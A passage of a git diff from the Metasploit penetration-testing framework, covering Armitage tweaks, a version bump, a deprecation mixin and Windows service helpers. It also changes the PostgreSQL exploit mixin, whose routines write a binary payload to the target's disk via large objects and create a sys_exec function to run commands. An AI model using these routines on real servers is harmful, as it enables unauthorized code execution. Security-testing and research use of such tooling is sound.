@@ -106,6 +107,7 @@ sub createCredentialsTab { $queue = [new armitage.ConsoleQueue: $client]; foreach $entry ($entries) { ($user, $pass, $host) = $entry; + $pass = fixPass($pass); [$queue addCommand: $null, "creds -d $host -u $user -P $pass"]; } diff --git a/external/source/armitage/scripts/preferences.sl b/external/source/armitage/scripts/preferences.sl index 07dd458a4f..19ad929524 100644 --- a/external/source/armitage/scripts/preferences.sl +++ b/external/source/armitage/scripts/preferences.sl @@ -114,7 +114,12 @@ sub loadPreferences { sub loadDatabasePreferences { if ($yaml_file eq "" || !-exists $yaml_file) { - $yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml"); + if (thisIsTheirCommercialStuff()) { + $yaml_file = getFileProper($BASE_DIRECTORY, "ui", "config", "database.yml"); + } + else { + $yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml"); + } } if (!-exists $yaml_file) { @@ -340,6 +345,7 @@ sub createPreferencesTab { sub setupBaseDirectory { local('%o'); %o = call($client, "module.options", "post", "multi/gather/dns_bruteforce"); + if ("NAMELIST" in %o && "default" in %o["NAMELIST"]) { $BASE_DIRECTORY = getFileParent(getFileParent(getFileParent(getFileParent(%o["NAMELIST"]["default"])))); $DATA_DIRECTORY = getFileParent(getFileParent(%o["NAMELIST"]["default"])); @@ -385,3 +391,8 @@ sub dataDirectory { return $f; } + +sub thisIsTheirCommercialStuff { + # check if we're living in a Metasploit 4.5+ installer environment. + return iff("*app*pro*" iswm $BASE_DIRECTORY); +} diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index d1a64d0c85..ceed745950 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -294,6 +294,11 @@ sub startMetasploit { [System exit: 0]; } + # if the user chooses c:\metasploit AND we're in the 4.5 environment... adjust + if (-exists getFileProper($msfdir, "apps", "pro", "msf3")) { + $msfdir = getFileProper($msfdir, "apps", "pro"); + } + if (charAt($msfdir, -1) ne "\\") { $msfdir = "$msfdir $+ \\"; } @@ -472,6 +477,15 @@ sub _module_execute { $host = "all"; } + # fix SMBPass and PASSWORD options if necessary... + if ("PASSWORD" in $3) { + $3['PASSWORD'] = fixPass($3['PASSWORD']); + } + + if ("SMBPass" in $3) { + $3['SMBPass'] = fixPass($3['SMBPass']); + } + # okie then, let's create a console and execute all of this stuff... local('$queue $key $value'); @@ -607,3 +621,8 @@ sub initConsolePool { [$client addHook: "console.release", $pool]; [$client addHook: "console.release_and_destroy", $pool]; } + +sub fixPass { + return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1'); +} + diff --git a/external/source/armitage/src/cortana/Cortana.java b/external/source/armitage/src/cortana/Cortana.java index 7e1c7079f9..7dbc591e0c 100644 --- a/external/source/armitage/src/cortana/Cortana.java +++ b/external/source/armitage/src/cortana/Cortana.java @@ -428,13 +428,6 @@ public class Cortana implements Loadable, RuntimeWarningWatcher { /* start the timer thread */ new cortana.support.Heartbeat(events).start(); - - /* regularly communicate with Metasploit or else our connection will drop */ - new ArmitageTimer(client, "core.version", 200 * 1000L, new ArmitageTimerClient() { - public boolean result(String command, Object[] arguments, Map results) { - return true; - } - }, false); } started = true; } diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index dadc03f052..bc1569659c 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -25,6 +25,7 @@ public class ATable extends JTable { specialitems.add("SigningCert"); specialitems.add("WORDLIST"); specialitems.add("SESSION"); + specialitems.add("REXE"); return new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 207e8e00ff..5ea39884dd 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,24 @@ Armitage Changelog ================== +4 Jan 13 (tested against msf 16252) +-------- +- Added a helper to set REXE option +- Added an icon to represent Windows 8 +- [host] -> Login menu is now built using open services for all + highlighted hosts, not just the first one. +- [host] -> Login items now escape punctuation characters in passwords + before passing them to a framework module. +- Added the windows and linux postgres_payload exploits to the use a + reverse payload by default list. +- Small tweak to allow Armitage to work with Metasploit 4.5 installed + environment on Windows. + +Cortana Updates (for scripters) +-------- +- &credential_add and &credential_delete no longer break when a + password has creative punctuation in it. + 26 Nov 12 (tested against msf 16114) --------- - Windows command shell tab is now friendlier to commands that prompt diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb index 2f40def8b5..56f6cad19f 100644 --- a/lib/msf/core/auxiliary/nmap.rb +++ b/lib/msf/core/auxiliary/nmap.rb @@ -224,7 +224,7 @@ def nmap_validate_arg(str) disallowed_characters = /([\x00-\x19\x21\x23-\x26\x28\x29\x3b\x3e\x60\x7b\x7c\x7d\x7e-\xff])/n badchar = str[disallowed_characters] if badchar - print_error "Malformed nmap arguments (contains '#{c}'): #{str}" + print_error "Malformed nmap arguments (contains '#{badchar}'): #{str}" return false end # Check for commas outside of quoted arguments diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 030c1d9aad..1749c08b4e 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -675,6 +675,13 @@ class DBManager if sess_data[:desc] sess_data[:desc] = sess_data[:desc][0,255] end + + # In the case of multi handler we cannot yet determine the true + # exploit responsible. But we can at least show the parent versus + # just the generic handler: + if session.via_exploit == "exploit/multi/handler" + sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] + end s = ::Mdm::Session.new(sess_data) s.save! @@ -684,19 +691,26 @@ class DBManager end # If this is a live session, we know the host is vulnerable to something. - # If the exploit used was multi/handler, though, we don't know what - # it's vulnerable to, so it isn't really useful to save it. - if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler" + if opts[:session] and session.via_exploit return unless host mod = framework.modules.create(session.via_exploit) + + if session.via_exploit == "exploit/multi/handler" + mod_fullname = sess_data[:datastore]['ParentModule'] + mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name + else + mod_name = mod.name + mod_fullname = mod.fullname + end + vuln_info = { :host => host.address, - :name => mod.name, + :name => mod_name, :refs => mod.references, :workspace => wspace, :exploited_at => Time.now.utc, - :info => "Exploited by #{mod.fullname} to create Session #{s.id}" + :info => "Exploited by #{mod_fullname} to create Session #{s.id}" } port = session.exploit_datastore["RPORT"] @@ -706,10 +720,15 @@ class DBManager vuln = framework.db.report_vuln(vuln_info) + if session.via_exploit == "exploit/multi/handler" + via_exploit = sess_data[:datastore]['ParentModule'] + else + via_exploit = session.via_exploit + end attempt_info = { :timestamp => Time.now.utc, :workspace => wspace, - :module => session.via_exploit, + :module => via_exploit, :username => session.username, :refs => mod.references, :session_id => s.id, diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index cda562efc0..b7ab207e52 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -13,10 +13,13 @@ module Exploit::Remote::Postgres require 'postgres_msf' require 'base64' include Msf::Db::PostgresPR + + # @!attribute [rw] postgres_conn + # @return [::Msf::Db::PostgresPR::Connection] attr_accessor :postgres_conn # - # Creates an instance of a MSSQL exploit module. + # Creates an instance of a PostgreSQL exploit module. # def initialize(info = {}) super @@ -38,27 +41,66 @@ module Exploit::Remote::Postgres register_autofilter_services(%W{ postgres }) end - # postgres_login takes a number of arguments (defaults to the datastore for - # appropriate values), and will either populate self.postgres_conn and return - # :connected, or will return :error, :error_databse, or :error_credentials - # Fun fact: if you get :error_database, it means your username and password - # was accepted (you just failed to guess a correct running database instance). - # Note that postgres_login will first trigger postgres_logout if the module - # is already connected. - def postgres_login(args={}) + # @!group Datastore accessors + + # Return the datastore value of the same name + # @return [String] IP address of the target + def rhost; datastore['RHOST']; end + # Return the datastore value of the same name + # @return [Fixnum] TCP port where the target service is running + def rport; datastore['RPORT']; end + # Return the datastore value of the same name + # @return [String] Username for authentication + def username; datastore['USERNAME']; end + # Return the datastore value of the same name + # @return [String] Password for authentication + def password; datastore['PASSWORD']; end + # Return the datastore value of the same name + # @return [String] Database to connect to when authenticating + def database; datastore['DATABASE']; end + # Return the datastore value of the same name + # @return [Boolean] Whether to print verbose output + def verbose; datastore['VERBOSE']; end + + # @!endgroup + + # Takes a number of arguments (defaults to the datastore for appropriate + # values), and will either populate {#postgres_conn} and return + # +:connected+, or will return +:error+, +:error_databse+, or + # +:error_credentials+ in case of an error. + # + # Fun fact: if you get +:error_database+, it means your username and + # password was accepted (you just failed to guess a correct running database + # instance). + # + # @note This method will first call {#postgres_logout} if the module is + # already connected. + # + # @param opts [Hash] Options for authenticating + # @option opts [String] :database The database + # @option opts [String] :username The username + # @option opts [String] :username The username + # @option opts [String] :server IP address or hostname of the target server + # @option opts [Fixnum] :port TCP port on :server + # + # @return [:error_database] if user/pass are correct but database is wrong + # @return [:error_credentials] if user/pass are wrong + # @return [:error] if some other error occurred + # @return [:connected] if everything went as planned + def postgres_login(opts={}) postgres_logout if self.postgres_conn - db = args[:database] || datastore['DATABASE'] - username = args[:username] || datastore['USERNAME'] - password = args[:password] || datastore['PASSWORD'] - ip = args[:server] || datastore['RHOST'] - port = args[:port] || datastore['RPORT'] + db = opts[:database] || datastore['DATABASE'] + username = opts[:username] || datastore['USERNAME'] + password = opts[:password] || datastore['PASSWORD'] + ip = opts[:server] || datastore['RHOST'] + port = opts[:port] || datastore['RPORT'] uri = "tcp://#{ip}:#{port}" if Rex::Socket.is_ipv6?(ip) uri = "tcp://[#{ip}]:#{port}" end - verbose = args[:verbose] || datastore['VERBOSE'] + verbose = opts[:verbose] || datastore['VERBOSE'] begin self.postgres_conn = Connection.new(db,username,password,uri) rescue RuntimeError => e @@ -80,7 +122,9 @@ module Exploit::Remote::Postgres end end - # Logs out of a database instance. + # Logs out of a database instance and sets {#postgres_conn} to nil + # + # @return [void] def postgres_logout ip = datastore['RHOST'] port = datastore['RPORT'] @@ -92,9 +136,13 @@ module Exploit::Remote::Postgres print_status "#{ip}:#{port} Postgres - Disconnected" if verbose end - # If not currently connected, postgres_query will attempt to connect. If an + # If not currently connected, attempt to connect. If an # error is encountered while executing the query, it will return with # :error ; otherwise, it will return with :complete. + # + # @param sql [String] The query to run + # @param doprint [Boolean] Whether the result should be printed + # @return [Hash] def postgres_query(sql=nil,doprint=false) ip = datastore['RHOST'] port = datastore['RPORT'] @@ -104,7 +152,7 @@ module Exploit::Remote::Postgres end if self.postgres_conn sql ||= datastore['SQL'] - print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE'] + vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'" begin resp = self.postgres_conn.query(sql) rescue RuntimeError => e @@ -151,15 +199,21 @@ module Exploit::Remote::Postgres return :complete end - # postgres_fingerprint attempts to fingerprint a remote Postgresql instance, - # inferring version number from the failed authentication messages. + # Attempts to fingerprint a remote PostgreSQL instance, inferring version + # number from the failed authentication messages or simply returning the + # result of "select version()" if authentication was successful. + # + # @return [Hash] A hash containing the version in one of the keys :preauth, + # :auth, or :unkown, depending on how it was determined + # @see #postgres_authed_fingerprint + # @see #analyze_auth_error def postgres_fingerprint(args={}) return postgres_authed_fingerprint if self.postgres_conn db = args[:database] || datastore['DATABASE'] username = args[:username] || datastore['USERNAME'] password = args[:password] || datastore['PASSWORD'] - rhost = args[:server] || datastore['RHOST'] - rport = args[:port] || datastore['RPORT'] + rhost = args[:server] || datastore['RHOST'] + rport = args[:port] || datastore['RPORT'] uri = "tcp://#{rhost}:#{rport}" if Rex::Socket.is_ipv6?(rhost) @@ -176,6 +230,10 @@ module Exploit::Remote::Postgres return postgres_authed_fingerprint if self.postgres_conn end + # Ask the server what its version is + # + # @return (see #postgres_fingerprint) + # @see #postgres_fingerprint def postgres_authed_fingerprint resp = postgres_query("select version()",false) ver = resp[:complete].rows[0][0] @@ -185,6 +243,10 @@ module Exploit::Remote::Postgres # Matches up filename, line number, and routine with a version. # These all come from source builds of Postgres. TODO: check # in on the binary distros, see if they're different. + # + # @param e [RuntimeError] The exception raised by Connection.new + # @return (see #postgres_fingerprint) + # @see #postgres_fingerprint def analyze_auth_error(e) fname,fline,froutine = e.to_s.split("\t")[3,3] fingerprint = "#{fname}:#{fline}:#{froutine}" @@ -223,14 +285,26 @@ module Exploit::Remote::Postgres when "Fauth.c:L273:Rauth_failed" ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials) when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good) + when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials) + when "Fpostinit.c:L709:RInitPostgres" ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials) + + when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database + when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database + when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + # Windows when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials) when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials) when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication' ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good) + when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication' ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf) when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed' ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds) + when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed' ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds) + when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres' ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials) + when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication' ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf) + # OpenSolaris (thanks Alexander!) when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials) @@ -243,6 +317,8 @@ module Exploit::Remote::Postgres end end + # @return [String] The password as provided by the user or a random one if + # none has been given. def postgres_password if datastore['PASSWORD'].to_s.size > 0 datastore['PASSWORD'].to_s @@ -252,7 +328,7 @@ module Exploit::Remote::Postgres end # This presumes the user has rights to both the file and to create a table. - # If not, postgre_query() will return an error (usually :sql_error), + # If not, {#postgres_query} will return an error (usually :sql_error), # and it should be dealt with by the caller. def postgres_read_textfile(filename) # Check for temp table creation privs first. @@ -267,6 +343,8 @@ module Exploit::Remote::Postgres return postgres_query(read_query,true) end + # @return [Boolean] Whether the current user has privilege +priv+ on the + # current database def postgres_has_database_privilege(priv) sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')} ret = postgres_query(sql,false) @@ -278,8 +356,9 @@ module Exploit::Remote::Postgres end # Creates the function sys_exec() in the pg_temp schema. + # @deprecated Just get a real shell instead def postgres_create_sys_exec(dll) - q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable" + q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable" resp = postgres_query(q); if resp[:sql_error] print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}" @@ -290,6 +369,8 @@ module Exploit::Remote::Postgres # This presumes the pg_temp.sys_exec() udf has been installed, almost # certainly by postgres_create_sys_exec() + # + # @deprecated Just get a real shell instead def postgres_sys_exec(cmd) print_status "Attempting to Execute: #{cmd}" q = "select pg_temp.sys_exec('#{cmd}')" @@ -302,88 +383,106 @@ module Exploit::Remote::Postgres end - # Takes a local filename and uploads it into a table as a Base64 encoded string. - # Returns an array if successful, false if not. + # Uploads the given local file to the remote server + # + # @param fname [String] Name of a file on the local filesystem to be + # uploaded + # @param remote_fname (see #postgres_upload_binary_data) + # @return (see #postgres_upload_binary_data) def postgres_upload_binary_file(fname, remote_fname=nil) data = File.read(fname) postgres_upload_binary_data(data, remote_fname) end + # Writes data to disk on the target server. + # + # This is accomplished in 5 steps: + # 1. Create a new object with "select lo_create(-1)" + # 2. Delete any resulting rows in pg_largeobject table. + # On 8.x and older, postgres inserts rows as a result of the call to + # lo_create. Deleting them here approximates the state on 9.x where no + # such insert happens. + # 3. Break the data into LOBLOCKSIZE-byte chunks. + # 4. Insert each of the chunks as a row in pg_largeobject + # 5. Select lo_export to write the file to disk + # + # @param data [String] Raw binary to write to disk + # @param remote_fname [String] Name of the file on the remote server where + # the data will be stored. Default is ".dll" + # @return [nil] if any part of this process failed + # @return [String] if everything went as planned, the name of the file we + # dropped. This is really only useful if +remote_fname+ is nil def postgres_upload_binary_data(data, remote_fname=nil) - data = postgres_base64_data(data) - tbl,fld = postgres_create_stager_table - return false unless data && tbl && fld - q = "insert into #{tbl}(#{fld}) values('#{data}')" - resp = postgres_query(q) - if resp[:sql_error] - print_error resp[:sql_error] - return false - end - oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname) - return false unless oid && fout - return [tbl,fld,fout,oid] - end - - # Writes b64 data from a table field, decoded, to disk. - # - # This is accomplished with 3 sql queries: - # 1. select lo_create - # 2. version dependant: - # - on 9.x, insert into pg_largeobject - # - on older versions, update pg_largeobject - # 3. select lo_export to write the file to disk - # - def postgres_write_data_to_disk(tbl,fld,remote_fname=nil) - oid = rand(60000) + 1000 remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll" - ver = postgres_fingerprint - case ver[:auth] - when /PostgreSQL 9\./ - # 9.x does *not* insert the largeobject into the table when you do - # the lo_create, so we must insert it ourselves. - queries = [ - "select lo_create(#{oid})", - "insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')", - "select lo_export(#{oid}, '#{remote_fname}')" - ] - else - # 8.x inserts the largeobject into the table when you do the - # lo_create, so we with a value. - # - # 7.x is an unknown, but this behavior was the default before the - # addition of support for 9.x above, so try it this way and hope - # for the best - queries = [ - "select lo_create(#{oid})", - "update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}", - "select lo_export(#{oid}, '#{remote_fname}')" - ] + # From the Postgres documentation: + # SELECT lo_creat(-1); -- returns OID of new, empty large object + # Doing it this way instead of calling lo_create with a random number + # ensures that we don't accidentally hit the id of a real object. + resp = postgres_query "select lo_creat(-1)" + unless resp and resp[:complete] and resp[:complete].rows[0] + print_error "Failed to get a new loid" + return end + oid = resp[:complete].rows[0][0].to_i + + queries = [ "delete from pg_largeobject where loid=#{oid}" ] + + # Break the data into smaller chunks that can fit in the size allowed in + # the pg_largeobject data column. + # From the postgres documentation: + # "The amount of data per page is defined to be LOBLKSIZE (which is + # currently BLCKSZ/4, or typically 2 kB)." + # Empirically, it seems that 8kB is fine on 9.x, but we play it safe and + # stick to 2kB. + chunks = [] + while ((c = data.slice!(0..2047)) && c.length > 0) + chunks.push c + end + + chunks.each_with_index do |chunk, pageno| + b64_data = postgres_base64_data(chunk) + insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))" + queries.push( "#{insert}"%[oid, pageno, b64_data] ) + end + queries.push "select lo_export(#{oid}, '#{remote_fname}')" + + # Now run each of the queries we just built queries.each do |q| resp = postgres_query(q) if resp && resp[:sql_error] print_error "Could not write the library to disk." print_error resp[:sql_error] - break + # Can't really recover from this, bail + return nil end end - return oid,remote_fname + return remote_fname end - # Base64's a file and returns the data. + # Calls {#postgres_base64_data} with the contents of file +fname+ + # + # @param fname [String] Name of a file on the local system + # @return (see #postgres_base64_data) def postgres_base64_file(fname) data = File.open(fname, "rb") {|f| f.read f.stat.size} postgres_base64_data(data) end + # Converts data to base64 with no newlines + # + # @param data [String] Raw data to be base64'd + # @return [String] A base64 string suitable for passing to postgresql's + # decode(..., 'base64') function def postgres_base64_data(data) [data].pack("m*").gsub(/\r?\n/,"") end # Creates a temporary table to store base64'ed binary data in. + # + # @deprecated No longer necessary since we can insert base64 data directly def postgres_create_stager_table tbl = Rex::Text.rand_text_alpha(8).downcase fld = Rex::Text.rand_text_alpha(8).downcase diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index da2f2abe86..01aa4ba334 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -31,6 +31,7 @@ module Exploit::Remote::SMTPDeliver OptString.new('SUBJECT', [ true, 'Subject line of the email' ]), OptString.new('USERNAME', [ false, 'SMTP Username for sending email', '' ]), OptString.new('PASSWORD', [ false, 'SMTP Password for sending email', '' ]), + OptString.new('DOMAIN', [false, 'SMTP Domain to EHLO to', '']), OptString.new('VERBOSE', [ false, 'Display verbose information' ]), ], Msf::Exploit::Remote::SMTPDeliver) register_autofilter_ports([ 25, 465, 587, 2525, 25025, 25000]) @@ -72,7 +73,11 @@ module Exploit::Remote::SMTPDeliver print_verbose("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) - domain = Rex::Text.rand_text_alpha(rand(32)+1) + if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' + domain = datastore['DOMAIN'] + else + domain = Rex::Text.rand_text_alpha(rand(32)+1) + end res = raw_send_recv("EHLO #{domain}\r\n", nsock) if res =~ /STARTTLS/ diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index 40607e11f9..99050a6cb5 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -17,9 +17,9 @@ class Framework # Major = 4 - Minor = 5 + Minor = 6 Point = 0 - Release = "-release" + Release = "-dev" if(Point) Version = "#{Major}.#{Minor}.#{Point}#{Release}" diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb new file mode 100644 index 0000000000..e43d41a991 --- /dev/null +++ b/lib/msf/core/module/deprecated.rb @@ -0,0 +1,58 @@ + +module Msf::Module::Deprecated + + # Additional class methods for deprecated modules + module ClassMethods + # Mark this module as deprecated + # + # Any time this module is run it will print warnings to that effect. + # + # @param deprecation_date [Date,#to_s] The date on which this module will + # be removed + # @param replacement_module [String] The name of a module that users + # should be using instead of this deprecated one + # @return [void] + def deprecated(deprecation_date=nil, replacement_module=nil) + # Yes, class instance variables. + @replacement_module = replacement_module + @deprecation_date = deprecation_date + end + + # The name of a module that users should be using instead of this + # deprecated one + # + # @return [String,nil] + # @see ClassMethods#deprecated + def replacement_module; @replacement_module; end + + # The date on which this module will be removed + # + # @return [Date,nil] + # @see ClassMethods#deprecated + def deprecation_date; @deprecation_date; end + end + + # (see ClassMethods#replacement_module) + def replacement_module; self.class.replacement_module; end + # (see ClassMethods#deprecation_date) + def deprecation_date; self.class.deprecation_date; end + + # Extends with {ClassMethods} + def self.included(base) + base.extend(ClassMethods) + end + + def setup + print_warning("*"*72) + print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*") + if deprecation_date + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + end + if replacement_module + print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + end + print_warning("*"*72) + super + end + +end diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb index 24138bd09d..ec764c2d04 100644 --- a/lib/msf/core/payload/php.rb +++ b/lib/msf/core/payload/php.rb @@ -12,10 +12,10 @@ module Msf::Payload::Php # # The generated code will initialize # - # @options options [String] :disabled_varname PHP variable name in which to + # @option options [String] :disabled_varname PHP variable name in which to # store an array of disabled functions. # - # @returns [String] A chunk of PHP code + # @return [String] A chunk of PHP code # def php_preamble(options = {}) dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) @@ -42,15 +42,15 @@ module Msf::Payload::Php # # Generate a chunk of PHP code that tries to run a command. # - # @options options [String] :cmd_varname PHP variable name containing the + # @option options [String] :cmd_varname PHP variable name containing the # command to run - # @options options [String] :disabled_varname PHP variable name containing + # @option options [String] :disabled_varname PHP variable name containing # an array of disabled functions. See #php_preamble - # @options options [String] :output_varname PHP variable name in which to + # @option options [String] :output_varname PHP variable name in which to # store the output of the command. Will contain 0 if no exec functions # work. # - # @returns [String] A chunk of PHP code that, with a little luck, will run a + # @return [String] A chunk of PHP code that, with a little luck, will run a # command. # def php_system_block(options = {}) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 64e9f0342f..3a2dea9c48 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -5,34 +5,108 @@ module Msf class Post module Windows + +# @deprecated Use {Services} instead module WindowsServices + def self.included(base) + include Services + end + + def setup + print_error("The Windows::WindowsServices mixin is deprecated, use Windows::Services instead") + super + end +end + +# +# Post module mixin for dealing with Windows services +# +module Services include ::Msf::Post::Windows::Registry + # - # List all Windows Services present. Returns an Array containing the names - # of the services. + # Open the service manager with advapi32.dll!OpenSCManagerA on the + # given host or the local machine if :host option is nil. If called + # with a block, yields the manager and closes it when the block + # returns. + # + # @param opts [Hash] + # @option opts [String] :host (nil) The host on which to open the + # service manager. May be a hostname or IP address. + # @option opts [Fixnum] :access (0xF003F) Bitwise-or of the + # SC_MANAGER_* constants (see + # {http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx}) + # + # @return [Fixnum] Opaque Windows handle SC_HANDLE as returned by + # OpenSCManagerA() + # @yield [manager] Gives the block a manager handle as returned by + # advapi32.dll!OpenSCManagerA. When the block returns, the handle + # will be closed with {#close_sc_manager}. + # @raise [RuntimeError] if OpenSCManagerA returns a NULL handle + # + def open_sc_manager(opts={}) + host = opts[:host] || nil + access = opts[:access] || 0xF003F + machine_str = host ? "\\\\#{host}" : nil + + # SC_HANDLE WINAPI OpenSCManager( + # _In_opt_ LPCTSTR lpMachineName, + # _In_opt_ LPCTSTR lpDatabaseName, + # _In_ DWORD dwDesiredAccess + # ); + manag = session.railgun.advapi32.OpenSCManagerA(machine_str,nil,access) + if (manag["return"] == 0) + raise RuntimeError.new("Unable to open service manager, GetLastError: #{manag["GetLastError"]}") + end + + if (block_given?) + begin + yield manag["return"] + ensure + close_sc_manager(manag["return"]) + end + else + return manag["return"] + end + end + + # + # Call advapi32.dll!CloseServiceHandle on the given handle + # + def close_sc_manager(handle) + if handle + session.railgun.advapi32.CloseServiceHandle(handle) + end + end + + # + # List all Windows Services present + # + # @return [Array] The names of the services. + # + # @todo Rewrite to allow operating on a remote host # def service_list serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" - threadnum = 0 a =[] services = [] - registry_enumkeys(serviceskey).each do |s| - if threadnum < 10 - a.push(::Thread.new(s) { |sk| - begin - srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s - if srvtype =~ /32|16/ - services << sk - end - rescue - end - }) - threadnum += 1 - else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - threadnum = 0 + keys = registry_enumkeys(serviceskey) + keys.each do |s| + if a.length >= 10 + a.first.join + a.delete_if {|x| not x.alive?} end + t = framework.threads.spawn(self.refname+"-ServiceRegistryList",false,s) { |sk| + begin + srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s + if srvtype == "32" or srvtype == "16" + services << sk + end + rescue + end + } + a.push(t) end return services @@ -45,6 +119,13 @@ module WindowsServices # command executed by the service. Service name is case sensitive. Hash # keys are Name, Start, Command and Credentials. # + # @param name [String] The target service's name (not to be confused + # with Display Name). Case sensitive. + # + # @return [Hash] + # + # @todo Rewrite to allow operating on a remote host + # def service_info(name) service = {} servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}" @@ -68,6 +149,8 @@ module WindowsServices # Mode is a string with either auto, manual or disable for the # corresponding setting. The name of the service is case sensitive. # + # @todo Rewrite to allow operating on a remote host + # def service_change_startup(name,mode) servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}" case mode.downcase @@ -81,22 +164,30 @@ module WindowsServices end # - # Create a service that runs it's own process. + # Create a service that runs +executable_on_host+ on the session host # - # It takes as values the service name as string, the display name as - # string, the path of the executable on the host that will execute at - # startup as string and the startup type as an integer of 2 for Auto, 3 for - # Manual or 4 for Disable, default Auto. + # @param name [String] Name of the service to be used as the key + # @param display_name [String] Name of the service as displayed by mmc + # @param executable_on_host [String] EXE on the remote filesystem to + # be used as the service executable + # @param startup [Fixnum] Constant used by CreateServiceA for startup + # type: 2 for Auto, 3 for Manual, 4 for Disable. Default is Auto + # @param server [String,nil] A hostname or IP address. Default is the + # remote localhost + # + # @return [true,false] True if there were no errors, false otherwise # def service_create(name, display_name, executable_on_host, startup=2, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - manag = adv.OpenSCManagerA(machine_str,nil,0x13) - if(manag["return"] != 0) + + # SC_MANAGER_CONNECT 0x01 + # SC_MANAGER_CREATE_SERVICE 0x02 + # SC_MANAGER_QUERY_LOCK_STATUS 0x10 + open_sc_manager(:host=>server, :access=>0x13) do |manager| # SC_HANDLE WINAPI CreateService( # __in SC_HANDLE hSCManager, # __in LPCTSTR lpServiceName, - # __in_opt LPCTSTR lpDisplayName, + # __in_opt LPCTSTR lpDisplayName, # __in DWORD dwDesiredAccess, # __in DWORD dwServiceType, # __in DWORD dwStartType, @@ -108,113 +199,112 @@ module 